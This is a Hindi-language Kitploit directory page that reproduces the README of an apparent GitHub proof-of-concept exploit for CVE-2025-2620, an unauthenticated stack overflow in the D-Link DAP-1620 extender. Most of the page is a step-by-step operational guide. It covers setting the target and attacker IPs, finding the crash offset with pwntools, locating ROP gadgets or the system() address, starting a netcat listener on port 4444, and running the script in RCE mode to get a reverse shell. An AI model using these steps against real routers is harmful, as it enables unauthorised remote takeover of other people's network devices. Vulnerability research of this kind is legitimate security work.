Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2620-poc | Kitploit
उपकरण/GitHubGitHub/otsmane-ahmed/cve-2025-2620-poc
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंटबाइनरी शोषण
1611 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
otsmane-ahmed/cve-2025-2620-poc

CVE-2025-2620-poc

रिपॉजिटरी देखें

CVE-2025-2620 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट

अवलोकन

इस रिपॉजिटरी में CVE-2025-2620 के लिए एक उन्नत प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो D-Link DAP-1620 राउटर में फर्मवेयर संस्करण 1.03 पर चलने वाले एक गंभीर स्टैक-आधारित बफर ओवरफ्लो भेद्यता है। यह भेद्यता बिना प्रमाणीकरण वाले दूरस्थ हमलावरों को राउटर के वेब सर्वर को क्रैश करने (Denial-of-Service, DoS) और संभावित रूप से मनमाना कोड निष्पादित करने (Remote Code Execution, RCE) की अनुमति देती है।

इस परियोजना का उद्देश्य एक्सप्लॉइट विकास कौशल को प्रदर्शित करना है।

भेद्यता विवरण

CVE विवरण

CVE-2025-2620 D-Link DAP-1620 राउटर के mod_graph_auth_uri_handler फ़ंक्शन को प्रभावित करता है, विशेष रूप से /storage एंडपॉइंट के भीतर। यह भेद्यता अनुचित बाउंड्स जाँच के कारण होती है, जो हमलावर को आवंटित बफर आकार से अधिक बड़ा इनपुट भेजने की अनुमति देती है, जिससे स्टैक-आधारित बफर ओवरफ्लो होता है।

प्रभाव

  • Denial-of-Service (DoS): राउटर के HTTP सर्वर को क्रैश करता है, जिससे यह रिबूट होने तक अनुत्तरदायी हो जाता है।
  • Remote Code Execution (RCE): हमलावर रिटर्न एड्रेस को ओवरराइट कर सकते हैं और राउटर के MIPS-आधारित आर्किटेक्चर पर मनमाना कोड निष्पादित कर सकते हैं।
  • कोई प्रमाणीकरण आवश्यक नहीं: यह भेद्यता बिना क्रेडेंशियल्स के दूरस्थ रूप से ट्रिगर की जा सकती है, जिससे इसकी गंभीरता बढ़ जाती है।

तकनीकी विवरण

भेद्य फ़ंक्शन HTTP अनुरोधों से एक प्रमाणीकरण पैरामीटर (auth) को संसाधित करता है:

root@kitploit:~
void mod_graph_auth_uri_handler(char *input) {
    char buffer[512];  // Fixed-size stack buffer
    strcpy(buffer, input);  // No length check, causes overflow
    // Process authentication...
}

एक हमलावर द्वारा भेजा गया अत्यधिक बड़ा पेलोड (जैसे, 1024+ बाइट्स) आसन्न मेमोरी को ओवरराइट करता है, जिसमें फ़ंक्शन का रिटर्न एड्रेस भी शामिल है, जो संभावित रूप से कोड निष्पादन की ओर ले जाता है।

CVSS v3.1 स्कोर: 9.8 (क्रिटिकल)

प्रभावित डिवाइस

D-Link DAP-1620 एक Wi-Fi रेंज एक्सटेंडर है जिसमें निम्नलिखित विशिष्टताएँ हैं:

  • CPU: Realtek RTL8197F (MIPS 24Kc, ~600 MHz)
  • RAM: 64 MB
  • Flash: 16 MB
  • Wi-Fi: Dual-band 802.11ac
  • Firmware: 1.03 (पुष्टिकृत भेद्य)

समान फर्मवेयर वाले अन्य D-Link राउटर/एक्सटेंडर भी प्रभावित हो सकते हैं।

प्रकटीकरण समयरेखा

  • 22 मार्च, 2025 – CVE-2025-2620 NVD/MITRE पर प्रकाशित हुआ।
  • 22 मार्च, 2025 – यह PoC विकसित और परीक्षण किया गया।
  • 22 मार्च, 2025 – इस तिथि तक D-Link से कोई आधिकारिक पैच नहीं।

PoC एक्सप्लॉइट विवरण

विशेषताएँ

संयुक्त PoC – इसमें बफर ओवरफ्लो परीक्षण और RCE एक्सप्लॉइट दोनों शामिल हैं।
स्टैक-आधारित बफर ओवरफ्लो परीक्षण – भेद्य राउटर की पहचान करता है।
पूर्ण रिमोट कोड निष्पादन (RCE) एक्सप्लॉइट – एक रिवर्स शेल उत्पन्न करता है।
कॉन्फ़िगर करने योग्य पेलोड आकार और रिटर्न एड्रेस – विभिन्न राउटर मॉडलों के लिए अनुकूलनीय।
उन्नत डिबगिंग – एक्सप्लॉइट पैरामीटर परिष्कृत करने के लिए क्रैश ऑफ़सेट लॉग करता है।

स्थापना और उपयोग

चरण 1: रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/CVE-2025-2620-poc.git
cd CVE-2025-2620-poc

चरण 2: निर्भरताएँ स्थापित करें

सुनिश्चित करें कि आपके पास Python3 और pwntools स्थापित हैं:

root@kitploit:~
pip install pwntools

चरण 3: एक्सप्लॉइट कॉन्फ़िगर करें

CVE-2025-2620_poc.py स्क्रिप्ट को संशोधित करें:

राउटर का IP सेट करें:

root@kitploit:~
TARGET_IP = "192.168.0.1"  # change to match your router

अपने अटैक मशीन का IP सेट करें:

root@kitploit:~
ATTACKER_IP = "192.168.0.100"  # change to your local IP
ATTACKER_PORT = 4444  # change if needed

यदि आवश्यक हो तो बफर आकार समायोजित करें:

root@kitploit:~
BUFFER_SIZE = 8000  # Increase if the router does not crash

EIP ऑफ़सेट खोजें और रिटर्न एड्रेस सेट करें:

चरण 1: एक साइक्लिक पैटर्न भेजें

एक अद्वितीय पैटर्न उत्पन्न करने और भेजने के लिए PoC को संशोधित करें:

root@kitploit:~
MODE = "overflow"  # Set to "overflow" to find the offset

स्क्रिप्ट चलाएँ:

root@kitploit:~
python3 CVE-2025-2620_poc.py
चरण 2: क्रैश एड्रेस जाँचें

राउटर को क्रैश करने के बाद, निम्न से segfault एड्रेस (EIP x86 पर या RA MIPS पर) जाँचें:

  • राउटर लॉग
  • डिबगर (gdb)
  • dmesg | grep 'segfault'

0x61616161 जैसे एड्रेस की तलाश करें (जिसका मतलब है कि साइक्लिक पैटर्न का हिस्सा रिटर्न पॉइंटर को ओवरराइट कर चुका है)।

चरण 3: ऑफ़सेट खोजें

सटीक ऑफ़सेट खोजने के लिए cyclic_find का उपयोग करें:

root@kitploit:~
from pwn import cyclic_find
print(cyclic_find(0x61616161))  # Replace with the crash address

यह सटीक OFFSET मान देता है। अपना PoC अपडेट करें:

root@kitploit:~
OFFSET = <FOUND OFFSET>  # Replace with the actual number
चरण 4: एक उपयुक्त रिटर्न एड्रेस (RET_ADDR) खोजें
  • विकल्प 1: एक JMP या CALL गैजेट खोजें

    root@kitploit:~
    ROPgadget --binary vulnerable_binary | grep "jmp"
    

    एक ऐसा एड्रेस चुनें जो रजिस्टर पर कूदता है (जैसे, jmp $sp या jmp $ra)।

  • विकल्प 2: ret2libc एड्रेस का उपयोग करें

    libc में system() का एड्रेस खोजें:

    root@kitploit:~
    objdump -D /lib/libc.so.6 | grep "system"
    

    फिर, इसे RET_ADDR के रूप में उपयोग करें:

    root@kitploit:~
    RET_ADDR = struct.pack("<I", 0xdeadbeef)  # Replace with actual address
    

चरण 4: एक लिसनर प्रारंभ करें

root@kitploit:~
nc -lvnp 4444

चरण 5: एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 CVE-2025-2620_poc.py --mode rce

Otsmane Ahmed द्वारा ❤️ के साथ विकसित

टूल डाउनलोड करें
मेट्रिकमान
हमला वेक्टरनेटवर्क
हमले की जटिलतानिम्न
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
गोपनीयता प्रभावउच्च
अखंडता प्रभावउच्च
उपलब्धता प्रभावउच्च